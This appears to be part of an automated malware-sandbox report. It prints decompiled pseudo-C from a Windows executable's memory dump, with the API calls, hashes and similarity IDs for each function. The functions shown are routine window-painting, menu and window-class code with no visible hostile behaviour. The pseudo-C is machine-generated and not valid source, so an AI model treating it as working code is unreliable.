                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DrawText$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1886049697-0
                                                                                • Opcode ID: b60231cd72ad85705e77e8efa6ebb8b133de81342258a358bc1fefc26b871bcd
                                                                                • Instruction ID: 4b3dc32afda254e071bd1cc5476ee5deb2a80a2c0b6ed73c94728484337b1361
                                                                                • Opcode Fuzzy Hash: b60231cd72ad85705e77e8efa6ebb8b133de81342258a358bc1fefc26b871bcd
                                                                                • Instruction Fuzzy Hash: 8231A070600114AFDB10EB2ADC85F8BB7F8AF46318F5440BBF904EB292CB789D119729
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00439A64, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E00439A64(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0043BD14(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x439b84);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E00413FA4( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E00439BC0(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x439b8b);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0043BD14(_v8),  &_v84);
				}
				return _t55;
			}


















                                                                                0x00439a65
                                                                                0x00439a67
                                                                                0x00439a6d
                                                                                0x00439a70
                                                                                0x00439a76
                                                                                0x00439a7b
                                                                                0x00439a8f
                                                                                0x00439a8f
                                                                                0x00439a93
                                                                                0x00439a94
                                                                                0x00439a99
                                                                                0x00439a9c
                                                                                0x00439aa9
                                                                                0x00439ac3
                                                                                0x00439ac6
                                                                                0x00439ad9
                                                                                0x00439adc
                                                                                0x00439ade
                                                                                0x00439adf
                                                                                0x00439ae1
                                                                                0x00439aec
                                                                                0x00439af5
                                                                                0x00439b07
                                                                                0x00000000
                                                                                0x00439b09
                                                                                0x00439b25
                                                                                0x00439b2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439b2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439b2e
                                                                                0x00439b2e
                                                                                0x00439b2f
                                                                                0x00439b2f
                                                                                0x00439ae1
                                                                                0x00439b32
                                                                                0x00439b36
                                                                                0x00439b3f
                                                                                0x00439b3f
                                                                                0x00439b4a
                                                                                0x00439aab
                                                                                0x00439ab2
                                                                                0x00439ab2
                                                                                0x00439b56
                                                                                0x00439b5d
                                                                                0x00439b60
                                                                                0x00439b63
                                                                                0x00439b68
                                                                                0x00439b6f
                                                                                0x00000000
                                                                                0x00439b7e
                                                                                0x00439b83

                                                                                APIs
                                                                                • BeginPaint.USER32(00000000,?), ref: 00439A8A
                                                                                • SaveDC.GDI32(?), ref: 00439ABE
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00439B20
                                                                                • RestoreDC.GDI32(?,?), ref: 00439B4A
                                                                                • EndPaint.USER32(00000000,?,00439B8B), ref: 00439B7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 3808407030-0
                                                                                • Opcode ID: 910f335cdd0922cf31afe9397841251fae4aface1fcd7c0656e0dbac6a07a740
                                                                                • Instruction ID: a0e3ca0c4c3b25b8cfb113fc5e9187cfd12e9294f5ee593db24c94ab03605c7e
                                                                                • Opcode Fuzzy Hash: 910f335cdd0922cf31afe9397841251fae4aface1fcd7c0656e0dbac6a07a740
                                                                                • Instruction Fuzzy Hash: 28414B70A04204AFCB04DF99C884EAEB7F9FF48318F1590AAE5049B362D7B9AD45CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00466B10, Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00466B10(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
				struct tagRECT _v20;
				void* __edi;
				void* __ebp;
				int _t17;
				CHAR* _t19;
				int _t31;
				CHAR* _t33;
				int _t43;
				CHAR* _t45;
				void* _t49;
				signed int _t56;
				int _t57;
				void* _t61;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t60 = __ecx;
				_t49 = __edx;
				_t56 = _a4;
				E0041F454( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
				if(_a8 != 1) {
					_t57 = _t56 | 0x00000005;
					__eflags = _t57;
					_t17 = E004045D8(__ecx);
					_t19 = E004047D0(__ecx);
					return DrawTextA(E0041FDC4(_t49), _t19, _t17,  &_v20, _t57);
				}
				OffsetRect( &_v20, 1, 1);
				E0041EB4C( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
				_t31 = E004045D8(_t60);
				_t33 = E004047D0(_t60);
				DrawTextA(E0041FDC4(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E0041EB4C( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
				_t43 = E004045D8(_t60);
				_t45 = E004047D0(_t60);
				return DrawTextA(E0041FDC4(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
			}
















                                                                                0x00466b1f
                                                                                0x00466b20
                                                                                0x00466b21
                                                                                0x00466b22
                                                                                0x00466b23
                                                                                0x00466b25
                                                                                0x00466b27
                                                                                0x00466b2f
                                                                                0x00466b38
                                                                                0x00466bc0
                                                                                0x00466bc0
                                                                                0x00466bca
                                                                                0x00466bd2
                                                                                0x00000000
                                                                                0x00466be0
                                                                                0x00466b46
                                                                                0x00466b53
                                                                                0x00466b64
                                                                                0x00466b6c
                                                                                0x00466b7a
                                                                                0x00466b87
                                                                                0x00466b94
                                                                                0x00466ba3
                                                                                0x00466bab
                                                                                0x00000000

                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 00466B46
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466B7A
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 00466B87
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466BB9
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466BE0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DrawText$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1886049697-0
                                                                                • Opcode ID: a4a248901a044ac9540b5c370ce27b35c249500a1b3aa5b27dd0c2d65dfffe11
                                                                                • Instruction ID: 325a6e5ce17f83a1198e6ea69a1305357d63e4c9b3ccf8f14f770f2d088acb65
                                                                                • Opcode Fuzzy Hash: a4a248901a044ac9540b5c370ce27b35c249500a1b3aa5b27dd0c2d65dfffe11
                                                                                • Instruction Fuzzy Hash: 17219FB170011467CB00FA6A9C81A9F72AC5F45728F05062FBA25F7282DA7DE9054369
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044583C, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0044583C(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0044583C(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0044596C(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0044596C(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0044596C(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E00445708(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x44435c; // 0x4443a8
						if(E00403740( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044596C(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                                                                0x0044583c
                                                                                0x00445840
                                                                                0x00445846
                                                                                0x00445850
                                                                                0x00445852
                                                                                0x00000000
                                                                                0x00445852
                                                                                0x0044585b
                                                                                0x00445860
                                                                                0x00000000
                                                                                0x00445862
                                                                                0x00445874
                                                                                0x00445879
                                                                                0x0044587d
                                                                                0x00445882
                                                                                0x0044588b
                                                                                0x00445895
                                                                                0x0044589c
                                                                                0x004458ac
                                                                                0x004458b1
                                                                                0x004458b1
                                                                                0x004458b3
                                                                                0x004458b4
                                                                                0x004458ba
                                                                                0x004458c0
                                                                                0x004458f5
                                                                                0x004458f7
                                                                                0x004458fc
                                                                                0x00000000
                                                                                0x00445902
                                                                                0x004458c5
                                                                                0x004458d2
                                                                                0x00000000
                                                                                0x004458e5
                                                                                0x004458e9
                                                                                0x004458f0
                                                                                0x00000000
                                                                                0x004458f0
                                                                                0x004458d2
                                                                                0x004458ba
                                                                                0x00445909

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c15339dd9b36668f47d8c9902b8558479ebbf9f4d3e662fa3b47d0d84adcacfa
                                                                                • Instruction ID: 4e1899da5d7f6748348b46f9fe3f1e7a3c70c1476eddfc55fcc1ecb0efe02a5a
                                                                                • Opcode Fuzzy Hash: c15339dd9b36668f47d8c9902b8558479ebbf9f4d3e662fa3b47d0d84adcacfa
                                                                                • Instruction Fuzzy Hash: 44116061B01B48DBFF60BE3A890575B27889F52B58F45442FBD42AB283CE3CDC15829C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045522C, Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0045522C(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x487714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E004325B4(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043BD14(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                                                0x0045522c
                                                                                0x00455230
                                                                                0x00455232
                                                                                0x00455234
                                                                                0x00455236
                                                                                0x0045523e
                                                                                0x004552dd
                                                                                0x004552e3
                                                                                0x0045524f
                                                                                0x00455254
                                                                                0x00455258
                                                                                0x004552be
                                                                                0x004552db
                                                                                0x004552db
                                                                                0x00000000
                                                                                0x004552be
                                                                                0x0045525a
                                                                                0x0045525c
                                                                                0x0045525c
                                                                                0x00455261
                                                                                0x0045527c
                                                                                0x00455285
                                                                                0x0045527a
                                                                                0x00000000
                                                                                0x0045527a
                                                                                0x0045528d
                                                                                0x0045528f
                                                                                0x0045528f
                                                                                0x00000000
                                                                                0x0045526b
                                                                                0x00455270
                                                                                0x00455291
                                                                                0x004552aa
                                                                                0x004552ac
                                                                                0x004552ac
                                                                                0x00000000
                                                                                0x004552aa
                                                                                0x00455261

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$CaptureLongWindow
                                                                                • String ID:
                                                                                • API String ID: 1158686931-0
                                                                                • Opcode ID: 260178c8c49f67dc7e552513bb903ecf6adffe9dc5e6df834c033165cfa38a6f
                                                                                • Instruction ID: 99e34f074c7de9a5728527735dec4b3c0637da1b987c04b54cf2be62137685ec
                                                                                • Opcode Fuzzy Hash: 260178c8c49f67dc7e552513bb903ecf6adffe9dc5e6df834c033165cfa38a6f
                                                                                • Instruction Fuzzy Hash: EF119371204A096FD660FA9AC950B7773DC9B18315F20057AFD59D3383EA6CFC048B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004242C8, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004242C8(int __eax) {
				int _t21;
				signed int _t29;
				char _t34;
				int _t42;
				int _t43;
				struct HDC__* _t44;
				intOrPtr _t45;

				_t21 = __eax;
				_t42 = __eax;
				_t45 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t45 + 0x14));
					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
						E00422C48(_t22);
					}
					_t21 = E004208AC( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
					_t43 = _t21;
					 *(_t45 + 0x10) = _t43;
					if(_t43 == 0) {
						_t44 = E004201BC(GetDC(0));
						if( *((char*)(_t45 + 0x71)) != 0) {
							L9:
							_t34 = 1;
						} else {
							_t29 = GetDeviceCaps(_t44, 0xc);
							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
								goto L9;
							} else {
								_t34 = 0;
							}
						}
						 *((char*)(_t45 + 0x71)) = _t34;
						if(_t34 != 0) {
							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
						}
						_t21 = ReleaseDC(0, _t44);
						if( *(_t45 + 0x10) == 0) {
							 *((char*)(_t42 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                                                                0x004242c8
                                                                                0x004242cc
                                                                                0x004242ce
                                                                                0x004242d5
                                                                                0x004242ef
                                                                                0x004242f5
                                                                                0x004242f7
                                                                                0x004242f7
                                                                                0x0042430e
                                                                                0x00424313
                                                                                0x00424315
                                                                                0x0042431a
                                                                                0x00424328
                                                                                0x0042432e
                                                                                0x00424357
                                                                                0x00424357
                                                                                0x00424330
                                                                                0x00424333
                                                                                0x00424351
                                                                                0x00000000
                                                                                0x00424353
                                                                                0x00424353
                                                                                0x00424353
                                                                                0x00424351
                                                                                0x00424359
                                                                                0x0042435e
                                                                                0x00424366
                                                                                0x00424366
                                                                                0x0042436c
                                                                                0x00424375
                                                                                0x00424377
                                                                                0x00000000
                                                                                0x00424377
                                                                                0x00424375
                                                                                0x0042431a
                                                                                0x0042437f

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042431E
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424333
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042433D
                                                                                • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                • ReleaseDC.USER32 ref: 0042436C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                                • String ID:
                                                                                • API String ID: 2404249990-0
                                                                                • Opcode ID: 91b32b8e0bb386d6f312d455e8532609e2f0d464e724ed159cd995770b339d27
                                                                                • Instruction ID: ad94edfb46578ea6a9ee65a130ec521f0314f5c0519a73110df1165b84e8db0c
                                                                                • Opcode Fuzzy Hash: 91b32b8e0bb386d6f312d455e8532609e2f0d464e724ed159cd995770b339d27
                                                                                • Instruction Fuzzy Hash: 2F11DA217043659ADB20EF75E4417EF3690EF81358F84012BFC50A62C1D3BC8890C3A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00452988, Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E00452988(void* __eax) {
				void* _t16;
				void* _t39;
				signed int _t42;

				_t16 = __eax;
				_t39 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x46bb20 != 0) {
					_t16 = E0043C018(__eax);
					if(_t16 != 0) {
						_t42 = GetWindowLongA(E0043BD14(_t39), 0xffffffec);
						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e2)) != 0) {
							if((_t42 & 0x00080000) == 0) {
								SetWindowLongA(E0043BD14(_t39), 0xffffffec, _t42 | 0x00080000);
							}
							return  *0x46bb20(E0043BD14(_t39),  *((intOrPtr*)(_t39 + 0x2e4)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x0046BBA4 |  *0x0046BBAC);
						} else {
							SetWindowLongA(E0043BD14(_t39), 0xffffffec, _t42 & 0xfff7ffff);
							return RedrawWindow(E0043BD14(_t39), 0, 0, 0x485);
						}
					}
				}
				return _t16;
			}






                                                                                0x00452988
                                                                                0x0045298a
                                                                                0x00452990
                                                                                0x004529a5
                                                                                0x004529ac
                                                                                0x004529c1
                                                                                0x004529ca
                                                                                0x004529db
                                                                                0x004529ee
                                                                                0x004529ee
                                                                                0x00000000
                                                                                0x00452a30
                                                                                0x00452a41
                                                                                0x00000000
                                                                                0x00452a57
                                                                                0x004529ca
                                                                                0x004529ac
                                                                                0x00452a5e

                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 004529BC
                                                                                • SetWindowLongA.USER32 ref: 004529EE
                                                                                • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004505F4), ref: 00452A28
                                                                                • SetWindowLongA.USER32 ref: 00452A41
                                                                                • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004505F4), ref: 00452A57
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayeredRedraw
                                                                                • String ID:
                                                                                • API String ID: 1758778077-0
                                                                                • Opcode ID: 894d1980ffac52b3b176b33d3d706154cbcf190e7536c4b35a97a9087a151112
                                                                                • Instruction ID: bd31bbafe7edde7c7c57afc0455362de60848b0023f737d7f0b8d26ba890ccd5
                                                                                • Opcode Fuzzy Hash: 894d1980ffac52b3b176b33d3d706154cbcf190e7536c4b35a97a9087a151112
                                                                                • Instruction Fuzzy Hash: 00112B61A0428125DF506B398C89B5B26485B0A318F14257BBD55EB3C7C7BC884C8BEC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041C9FC, Relevance: 7.6, APIs: 5, Instructions: 60registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E0041C9FC(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t6 =  *0x487714; // 0x400000
				 *0x46b4d0 = _t6;
				_t8 =  *0x46b4e4; // 0x41c9ec
				_t9 =  *0x487714; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00406CF8 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x487714; // 0x400000
						_t20 =  *0x46b4e4; // 0x41c9ec
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x46b4c0);
				}
				_t13 =  *0x487714; // 0x400000
				_t14 =  *0x46b4e4; // 0x41c9ec
				_t22 = CreateWindowExA(0x80, _t14, 0x41caac, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041C940(_a4, _a8));
				}
				return _t22;
			}














                                                                                0x0041ca03
                                                                                0x0041ca08
                                                                                0x0041ca11
                                                                                0x0041ca17
                                                                                0x0041ca1d
                                                                                0x0041ca25
                                                                                0x0041ca27
                                                                                0x0041ca2a
                                                                                0x0041ca38
                                                                                0x0041ca3a
                                                                                0x0041ca40
                                                                                0x0041ca46
                                                                                0x0041ca46
                                                                                0x0041ca50
                                                                                0x0041ca50
                                                                                0x0041ca57
                                                                                0x0041ca73
                                                                                0x0041ca83
                                                                                0x0041ca8a
                                                                                0x0041ca9b
                                                                                0x0041ca9b
                                                                                0x0041caa6

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Class$Window$CreateInfoLongRegisterUnregister
                                                                                • String ID:
                                                                                • API String ID: 3404767174-0
                                                                                • Opcode ID: 56e3be3d1ca59384ac2f34a2ececcd87050c90b929dd6f60012172fc4094a416
                                                                                • Instruction ID: 7cb591e502674757c5b69656be4cbc4188d227aadbe7795b2df51ffe080876a5
                                                                                • Opcode Fuzzy Hash: 56e3be3d1ca59384ac2f34a2ececcd87050c90b929dd6f60012172fc4094a416
                                                                                • Instruction Fuzzy Hash: 78015E71644108ABD611EB98DDC1F9A33ADEB08344F104526F905E73D2DB75E89187BE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

